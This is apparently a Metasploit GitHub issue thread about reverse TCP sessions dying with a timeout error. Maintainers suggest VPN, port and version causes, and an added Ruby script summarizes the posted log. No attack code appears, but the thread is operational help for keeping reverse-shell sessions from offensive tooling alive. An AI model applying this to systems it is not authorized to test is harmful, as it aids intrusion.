[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /stat
[09/13/2020 16:01:05] [w(0)] core: Session 1 has died
[09/13/2020 16:01:06] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
The versions and install method of your Metasploit setup:
Framework: 6.0.7-dev-61fd7334b7
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Git Clone
Each time a session gets opened I get this error:
core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
(with all payloads (Linux and PHP reverse TCP), with different ports)
Exception in scheduler thread
Hmm, so that seems to be related to this line: https://github.com/rapid7/metasploit-framework/blob/18b2c32c78dd1ea83b8d9aacc1b6961d85653f0b/lib/msf/core/session_manager.rb#L162
That doesn't seem to be doing any timing related operations so my guess is there is some setting or something related to that which is causing the timeout error.
My thoughts are that since you are using a VPN it may be timing out due to some delay caused by the VPN itself? It shouldn't be timing out instantly though. Perhaps look at increasing the timing on settings like AutoVerifySessionTimeout, SessionCommunicationTimeout, and similar options.
Also I notice you are still getting this error:
[09/13/2020 14:18:27] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
Perhaps try supplying a specific IP address you know the target can connect to or another port you know you can listen on? It's possible your host is not able to bind to the port you are after because something else is listening on it or you do not have sufficient permissions, which may be causing issues.
My last thought would be perhaps try seeing if you can allocate more memory or CPUs to your host? Seeing as this is a thread-related issue, it's possible it may be occurring due to a lack of available resources. This is more of a last-ditch attempt than anything else but it's worth a shot.
@apollyonfirstcome Also, would it at all be possible to test this without the VPN? If it's still occurring without the VPN then we can at least remove the possibility this is a VPN-specific issue.
Edit: One more thing that was brought up in convo with Spencer was that if you generated the payload with v5 of Metasploit and you are using MSFv6 to receive the connection, you're going to have a bad time due to the upgrades we made with v6. So make sure you are generating the payload with MSFv6 code and also receiving the connection/connecting to the target using MSFv6.
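An added example, not part of the thread and not Metasploit's own code: a small Ruby script that parses framework.log lines in the format posted in this issue, collapses repeated messages, and pulls the listener address out of each Rex::BindFailed entry, so the messages repeated at every console start are separated from the errors the comments discuss. The names `parse_log`, `summarize` and `bind_failures` are hypothetical, and the sample input is an excerpt of the log lines posted above.

```ruby
require 'time'

# Excerpt of the framework.log lines posted in this issue, embedded as sample input.
SAMPLE_LOG = <<~'LOG'
  [09/13/2020 14:13:55] [e(0)] core: Failed to connect to the database: No database YAML file
  [09/13/2020 14:13:58] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
  [09/13/2020 14:18:27] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
  [09/13/2020 14:18:38] [e(0)] core: Failed to connect to the database: No database YAML file
  [09/13/2020 14:18:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
  [09/13/2020 14:50:41] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
  [09/13/2020 14:58:13] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
  [09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /status
  [09/13/2020 16:01:05] [w(0)] core: Session 1 has died
  [09/13/2020 16:01:06] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
LOG

# Line layout: [MM/DD/YYYY HH:MM:SS] [<severity letter>(<level>)] <source>: <message>
LINE_RE = %r{\A\[(\d\d/\d\d/\d{4} \d\d:\d\d:\d\d)\] \[([a-z])\((\d+)\)\] (\w+): (.*)\z}
Entry = Struct.new(:time, :level, :source, :message)

def parse_log(text)
  text.each_line.map do |line|
    m = LINE_RE.match(line.chomp)
    m && Entry.new(Time.strptime(m[1], '%m/%d/%Y %H:%M:%S'), m[2], m[4], m[5])
  end.compact
end

# Collapse identical messages into one row with a count and first/last time seen.
def summarize(entries)
  rows = entries.group_by { |e| [e.level, e.source, e.message] }.map do |(level, source, msg), es|
    times = es.map(&:time)
    { level: level, source: source, message: msg, count: es.size, first: times.min, last: times.max }
  end
  rows.sort_by { |r| [-r[:count], r[:first]] }
end

# Unique listener addresses that could not be bound (Rex::BindFailed entries).
def bind_failures(entries)
  entries.map { |e| e.message[/Rex::BindFailed [^(]*\(([\d.]+:\d+)\)/, 1] }.compact.uniq
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_log(SAMPLE_LOG)
  summarize(entries).each { |r| puts format('%2dx [%s] %s: %s', r[:count], r[:level], r[:source], r[:message][0, 90]) }
  puts "bind failures: #{bind_failures(entries).join(', ')}"
end
```

Rows with a count of 1 near the end of the log (here the session death and the scheduler timeout) are the ones to read against the comments above.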
Thanks a lot for your help, and sorry for not having answered you before.
@apollyonfirstcome Did you manage to find a solution? If so, what was the solution that you found in the end?